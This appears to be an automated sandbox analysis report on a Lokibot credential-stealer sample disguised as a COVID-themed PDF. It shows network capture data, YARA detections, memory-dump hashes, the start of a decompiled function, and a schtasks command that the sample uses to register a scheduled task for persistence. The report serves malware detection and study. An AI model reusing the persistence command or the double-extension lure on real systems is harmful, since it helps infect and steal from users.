20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
                                        Jul 1, 2021 14:36:37.338437080 CEST | 1425 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b
                                        Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFF
                                        Jul 1, 2021 14:36:37.338485956 CEST1427INData Raw: 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d
                                        Data Ascii: } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; }
                                        Jul 1, 2021 14:36:37.338534117 CEST1428INData Raw: 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20
                                        Data Ascii: -align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } }
                                        Jul 1, 2021 14:36:37.338577032 CEST1430INData Raw: 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67
                                        Data Ascii: 1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP
                                        Jul 1, 2021 14:36:37.338614941 CEST1431INData Raw: 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72
                                        Data Ascii: uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/
                                        Jul 1, 2021 14:36:37.338654041 CEST1432INData Raw: 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54
                                        Data Ascii: p16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81
                                        Jul 1, 2021 14:36:37.338690996 CEST1433INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65
                                        Data Ascii: <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" />


                                        Code Manipulations

                                        Statistics

                                        CPU Usage


                                        Memory Usage


                                        High Level Behavior Distribution


                                        Behavior


                                        System Behavior

                                        General

                                        Start time:14:36:18
                                        Start date:01/07/2021
                                        Path:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe'
                                        Imagebase:0x2d0000
                                        File size:1109504 bytes
                                        MD5 hash:EA646520496FD4603AAF0F5778231F0D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:14:36:27
                                        Start date:01/07/2021
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qvDFOnW' /XML 'C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp'
                                        Imagebase:0x1340000
                                        File size:185856 bytes
                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:14:36:27
                                        Start date:01/07/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6b2800000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:14:36:28
                                        Start date:01/07/2021
                                        Path:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        Imagebase:0x7a0000
                                        File size:1109504 bytes
                                        MD5 hash:EA646520496FD4603AAF0F5778231F0D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Loki_1, Description: Loki Payload, Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        Disassembly

                                        Code Analysis


                                          Executed Functions

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.224616980.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: A$M$Z$a$m
                                          • API String ID: 0-1026592392
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.224616980.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.224616980.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 00B8B810
                                          • GetCurrentThread.KERNEL32 ref: 00B8B84D
                                          • GetCurrentProcess.KERNEL32 ref: 00B8B88A
                                          • GetCurrentThreadId.KERNEL32 ref: 00B8B8E3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 00B8B810
                                          • GetCurrentThread.KERNEL32 ref: 00B8B84D
                                          • GetCurrentProcess.KERNEL32 ref: 00B8B88A
                                          • GetCurrentThreadId.KERNEL32 ref: 00B8B8E3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00B8970E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00B8FDEA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID: CreateWindow
                                          • String ID:
                                          • API String ID: 716092398-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00B8FDEA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID: CreateWindow
                                          • String ID:
                                          • API String ID: 716092398-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B8BE67
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B8BE67
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B89789,00000800,00000000,00000000), ref: 00B8999A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B89789,00000800,00000000,00000000), ref: 00B8999A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00B8970E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetWindowLongW.USER32(?,?,?), ref: 00B8FF7D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID: LongWindow
                                          • String ID:
                                          • API String ID: 1378638983-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetWindowLongW.USER32(?,?,?), ref: 00B8FF7D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID: LongWindow
                                          • String ID:
                                          • API String ID: 1378638983-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221467066.000000000098D000.00000040.00000001.sdmp, Offset: 0098D000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221467066.000000000098D000.00000040.00000001.sdmp, Offset: 0098D000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221484152.000000000099D000.00000040.00000001.sdmp, Offset: 0099D000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 09134e841087669897bb8660837f23113be4af1a34ac567ea37e5df795bf9770
                                          • Instruction ID: a37c6a9667e04ef8f1d4c4e1d86e49ab3bbd8df084c912dff01a3d3994f91ad3
                                          • Opcode Fuzzy Hash: 09134e841087669897bb8660837f23113be4af1a34ac567ea37e5df795bf9770
                                          • Instruction Fuzzy Hash: 3F21F271504240DFDF14CF28D9C4B26BBA9FB88314F24C9A9D80A4B346C73BD846CA62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221484152.000000000099D000.00000040.00000001.sdmp, Offset: 0099D000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 62903fada175f9d429f174b5a8d244f378858e140915f58127a5ec87f28744ee
                                          • Instruction ID: 66fcc41d7138e9f81bf9ed4af57790399b7ed3a6c9a50e0f10b277a5459623ee
                                          • Opcode Fuzzy Hash: 62903fada175f9d429f174b5a8d244f378858e140915f58127a5ec87f28744ee
                                          • Instruction Fuzzy Hash: F8218E755093C08FCB12CF24D9D0B15BF71EB46314F28C5EAD8498B6A7C33A980ACB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221467066.000000000098D000.00000040.00000001.sdmp, Offset: 0098D000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9e9cd8aacd33506535d2ad590ff13daa1a79972ad8fbb3afe5d1e395e3249391
                                          • Instruction ID: 8fcbe2044c6f3c27c6b87f401c845ca88dde56cf004339e2c9438ee505fb4db4
                                          • Opcode Fuzzy Hash: 9e9cd8aacd33506535d2ad590ff13daa1a79972ad8fbb3afe5d1e395e3249391
                                          • Instruction Fuzzy Hash: 1811B176405280CFCB12DF14D5C4B16BF71FB84324F28C6AAE8050B75AC336D85ACBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221467066.000000000098D000.00000040.00000001.sdmp, Offset: 0098D000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9e9cd8aacd33506535d2ad590ff13daa1a79972ad8fbb3afe5d1e395e3249391
                                          • Instruction ID: 0cef39134415e8453d7671f863fc93c7de8e7174574c322627fc067ba3dfc59f
                                          • Opcode Fuzzy Hash: 9e9cd8aacd33506535d2ad590ff13daa1a79972ad8fbb3afe5d1e395e3249391
                                          • Instruction Fuzzy Hash: D911D376405280DFCB11DF20D5C4B16BF71FB94324F28C6A9D8490B7A6C336E85ACBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221467066.000000000098D000.00000040.00000001.sdmp, Offset: 0098D000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 83220b07262f67f16525e5f09559fb806b674cbedb4e6945d1c3b86e9f6dfeb0
                                          • Instruction ID: 2b1495a979cc6a189d72a838d455249cbc1c46b285c00fcb5b4d28c29d66db03
                                          • Opcode Fuzzy Hash: 83220b07262f67f16525e5f09559fb806b674cbedb4e6945d1c3b86e9f6dfeb0
                                          • Instruction Fuzzy Hash: C301F7B10097409AE720AA25CE80BA6FB9CEF41734F288859ED045B386D778AC44C7B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221467066.000000000098D000.00000040.00000001.sdmp, Offset: 0098D000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9b1d773cd4792cf6ef8f88f4748f74a49877f08bc4342799085fb009711008e4
                                          • Instruction ID: e124416246832149fb99e83683a072ad5da4e83c12ac982631ccd2f65d352684
                                          • Opcode Fuzzy Hash: 9b1d773cd4792cf6ef8f88f4748f74a49877f08bc4342799085fb009711008e4
                                          • Instruction Fuzzy Hash: 92F062B14093849BE7208A16CD84BA2FB9CEB45734F18C45AED085B786D7789C44CBB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 93b112e09ede9c1c471d980d68a2f4b4f950824a0677a343ae47ea64e8751803
                                          • Instruction ID: e6eb73ae77183a6522cb9a8e6c450e93a36631a1941cbccd6d2ed46759266e0b
                                          • Opcode Fuzzy Hash: 93b112e09ede9c1c471d980d68a2f4b4f950824a0677a343ae47ea64e8751803
                                          • Instruction Fuzzy Hash: 571295F1411F4ACAE710CF65EDA81893BA1B785B2AB914308D3615BAF1D7BC114AEF84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f008d0ef213ed80b4bb66d169907a2621f34249eeb175259fb36f7626fc3aba7
                                          • Instruction ID: 46cd6e217c43e6d024fa195db872e44c8a25f7490a19a1c4582ae331dfec3461
                                          • Opcode Fuzzy Hash: f008d0ef213ed80b4bb66d169907a2621f34249eeb175259fb36f7626fc3aba7
                                          • Instruction Fuzzy Hash: F7A17E32E006198FCF05EFA5C8445DEB7F2FF85300B1585AAE905BB261EB35A905CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.221562580.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 792eb111a3d12ee84699f538bd7ff90d31794020b0cecac58b723554102e0e3b
                                          • Instruction ID: e23f02dd82ed6bfa0d8d0f293074c995a69d6bd71a6ad780c0e99bb5f4d7d38e
                                          • Opcode Fuzzy Hash: 792eb111a3d12ee84699f538bd7ff90d31794020b0cecac58b723554102e0e3b
                                          • Instruction Fuzzy Hash: E1C1FEB1811B4E8BD710DF65ECA81897B71BB85B2AF514308D3616BAF0D7BC105AEF84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.224616980.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 10da0fb9b2a09b012264f382cdbe601fe2a23e69acb144858e966d03398f8c8d
                                          • Instruction ID: 230bf14c9b03159504a3e3a45e70d5015dd41939ccbfde87d3064c7f9edd336a
                                          • Opcode Fuzzy Hash: 10da0fb9b2a09b012264f382cdbe601fe2a23e69acb144858e966d03398f8c8d
                                          • Instruction Fuzzy Hash: 31519170E092088FDB45EFB9E981A9E7BF3EB89304F14C429D1059B364DF346A069F91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.224616980.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a873688945a31d30a7f3e96920ea88a3ff93fabbee94a8c368f2f27d0e7b30c0
                                          • Instruction ID: 0780920e737f464461e4418a518d1bfb1f25755f01827c50c63dd6b5e76df65c
                                          • Opcode Fuzzy Hash: a873688945a31d30a7f3e96920ea88a3ff93fabbee94a8c368f2f27d0e7b30c0
                                          • Instruction Fuzzy Hash: 28519170E092088FDB45EFB9E981A9E7BF3EB89304F14C429D1059B364DF346A069F91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.224616980.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c7d9f01c11b6eeeccb69965f90d1f2ab254e91146a62ad810a65acea448dfcee
                                          • Instruction ID: 239bb8304f075781b355c8fa97e187f56c4ac4c7f8f96da92daee3701a250222
                                          • Opcode Fuzzy Hash: c7d9f01c11b6eeeccb69965f90d1f2ab254e91146a62ad810a65acea448dfcee
                                          • Instruction Fuzzy Hash: D34135B1E056188BEB5CCF6B8C4068EFAF7BFC8200F18C5BA850D66254EB7409468F15
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.224616980.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f330868b6ae61fe0e05e523b3b5dfa39776b93415815689238d44302e50f8bb
                                          • Instruction ID: 1af80d5030957dfbab30cacb692b3f26102c8832734498392312e8dc4017ef03
                                          • Opcode Fuzzy Hash: 0f330868b6ae61fe0e05e523b3b5dfa39776b93415815689238d44302e50f8bb
                                          • Instruction Fuzzy Hash: 4B4128B1E056188BE75CCF6B8D4068EFAF3BFC8200F18C5BA851C6A254DF7409468F15
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          C-Code - Quality: 85%
                                          			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                          				struct _WIN32_FIND_DATAW _v596;
                                          				void* __ebx;
                                          				WCHAR* _t32;
                                          				void* _t35;
                                          				int _t43;
                                          				void* _t52;
                                          				int _t56;
                                          				intOrPtr _t60;
                                          				void* _t66;
                                          				void* _t73;
                                          				void* _t74;
                                          				WCHAR* _t98;
                                          				void* _t99;
                                          				void* _t100;
                                          				void* _t101;
                                          				WCHAR* _t102;
                                          				void* _t103;
                                          				void* _t104;
                                          
                                          				L004067C4(0xa); // executed
                                          				_t72 = 0;
                                          				_t100 = 0x2e;
                                          				_t106 = _a16;
